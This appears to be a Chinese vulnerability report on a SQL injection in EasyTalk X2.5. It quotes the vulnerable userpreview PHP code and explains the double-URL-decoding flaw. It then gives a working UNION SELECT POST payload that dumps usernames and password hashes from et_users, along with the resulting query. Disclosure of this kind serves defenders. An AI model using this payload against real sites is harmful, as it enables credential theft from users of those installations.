### 简要描述:
EasyTalk_X2.5 最新版SQL注入一枚。
### 详细说明:
漏洞位于/Home/Lib/Action/ApiAction.class.php的
```
public function userpreview() {
$username=trim(rawurldecode($this->_post('username')));
if ($username) {
parent::init();
$user = M('Users')->where("user_name='$username'")->find();
if ($user) {
if ($user['cityid']) {//用户所在地
$dtModel=M('District');
$pdata = $dtModel->where("id='$user[cityid]'")->find();
$pdata2 = $dtModel->where("id='$pdata[upid]'")->find();
$user['live_city']=$pdata2['name'].' '.$pdata['name'];
}
$isfriend=D('Friend')->followstatus($user['user_id'],$this->my['user_id']);
$f="<span id='followsp2_".$user['user_id']."'>";
if($isfriend[$user['user_id']]==1){
$f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico2.gif'> ".L('already_follow')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
}else if ($isfriend[$user[user_id]]==3){
$f.="<span class='followbtn'><img src='".__PUBLIC__."/images/common/fico.gif'> ".L('follow_followed')." | <a onclick=\"followop('delfollow/user_id/{$user[user_id]}','jc','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('cancel')."</a></span>";
}else{
$f.="<a class='bh' onclick=\"followop('addfollow/user_id/{$user[user_id]}','gz','{$user[nickname]}','{$user[user_id]}','".$isfriend[$user['user_id']]."',$(this))\">".L('have_a_follow')."</a>";
}
$f.="</span>";
if ($user['user_id']==$this->my['user_id']) {
$body2='';
} else {
$body2='<div class="fleft"><input type="button" value="'.L('send_message').'" onclick="sendprimsgbox(\''.$user['nickname'].'\')" class="button5"> <input type="button" value="@TA" onclick="talkBox(\'@'.$user['nickname'].' \')" class="button5"></div><div class="fright">'.$f.'</div>';
}
if(time()-$user['last_login']<=600){
if($user['isadmin']>0){
$zxico='<span class="adminico"> '.L('admin_online').'</span>';
} else {
$zxico='<span class="uonlineico"> '.L('user_online').'</span>';
}
} else {
$zxico='<span class="uofflineico"> '.L('user_offline').'</span>';
}
echo '<div class="body1">
<div class="limg"><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank"><img src="'.sethead($user['user_head']).'" width="50px" height="50px"></a></div>
<div class="linfo">
<p>
<div class="fleft">
<span class="'.setvip($user['user_auth']).'" '.viptitle($user['user_auth']).'><a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['nickname'].'</a></span>
</div>
<div class="fright" style="width:90px;font-size:12px">'.$zxico.'</div>
<div class="clearline"></div>
</p>
<p>'.($user['user_gender']==1?L('male'):L('female')).' '.$user['live_city'].'</p>
<p>'.L('follow').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=following" target="_blank">'.$user['follow_num'].'</a> '.L('follower').'<a href="'.SITE_URL.'/?'.$user['user_name'].'&act=follower" target="_blank">'.$user['followme_num'].'</a> '.L('talk').'<a href="'.SITE_URL.'/?'.$user['user_name'].'" target="_blank">'.$user['msg_num'].'</a></p>
</div>
<div class="clearline"></div>
<div class="linfo2">';
if ($user['user_auth']) {
echo getsubstr($user['auth_info'],0,35);
} else {
echo L('user_info').':'.getsubstr($user['user_info']?$user['user_info']:L('nothing_write'),0,35);
}
echo '</div>
</div>
<div class="body2">'.$body2.'</div>';
} else {
echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
}
} else {
echo '<div style="height:160px"><br/><br/><br/><center>'.L('loading_error').'</center></div>';
}
}
```
其中这句代码
$username=trim(rawurldecode($this->_post('username')));
使用了rawurldecode导致二次注入
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201402/201606133d574497983a9c551612990c2cde3d09.jpg" alt="sql3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/201606133d574497983a9c551612990c2cde3d09.jpg)
url为:
http://192.168.116.129/easytalk/?m=api&a=userpreview
POST数据为:
username=my5t3ry%2527/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users%23
最终带入数据库查询语句为:
```
SELECT * FROM `et_users` WHERE user_name='my5t3ry'/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users#' LIMIT 1
```
京公网安备 11010502034610号
暂无评论